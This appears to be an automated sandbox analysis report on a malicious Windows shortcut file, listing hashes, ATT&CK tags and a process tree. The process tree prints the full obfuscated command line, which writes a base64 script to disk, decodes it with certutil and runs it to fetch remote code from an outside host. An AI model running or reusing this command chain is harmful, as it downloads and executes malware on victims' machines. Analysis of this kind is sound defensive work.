d9ca073cae31b8240d4c8295437147a2721158f25c3791c32bd78e58eabe9889

Analysis

max time kernel
3s
max time network
33s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
09/02/2023, 14:16

Target

20da683eb5903624a7c6b1824ba09a99.lnk
Size

485B
MD5

20da683eb5903624a7c6b1824ba09a99
SHA1

45d5e2b2529d35d55eda037e7752b8c3a6119e87
SHA256

d9ca073cae31b8240d4c8295437147a2721158f25c3791c32bd78e58eabe9889
SHA512

3317d0f72d0953399ffad7c6fb53126cf738bae2f7fdf128579e68fb10564608436010b5e3c46a6edd851f47dc240332cd8fcc3937b0c2c80702e3463dfe359a

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 820 wrote to memory of 784	820	cmd.exe	29
PID 820 wrote to memory of 784	820	cmd.exe	29
PID 820 wrote to memory of 784	820	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\20da683eb5903624a7c6b1824ba09a99.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:820
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\KZUXT80\>nul 2>&1 &&s^eT SHGP=C:\KZUXT80\^KZUXT80.^jS&&echo dmFyIEN5bkQ9InNjIisiciI7RHluRD0iaXAiKyJ0OmgiO0V5bkQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDeW5EK0R5bkQrRXluRCsiLy82cnVhaGkud2ViY29uZWN0YS5waWNzLz8xLyIpOw==>!SHGP!&&cErtUtil -f -dEco^de !SHGP! !SHGP!&&ca^ll !SHGP!"
  2⤵
  PID:784

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/820-54-0x000007FEFBAC1000-0x000007FEFBAC3000-memory.dmp

Filesize
8KB

Download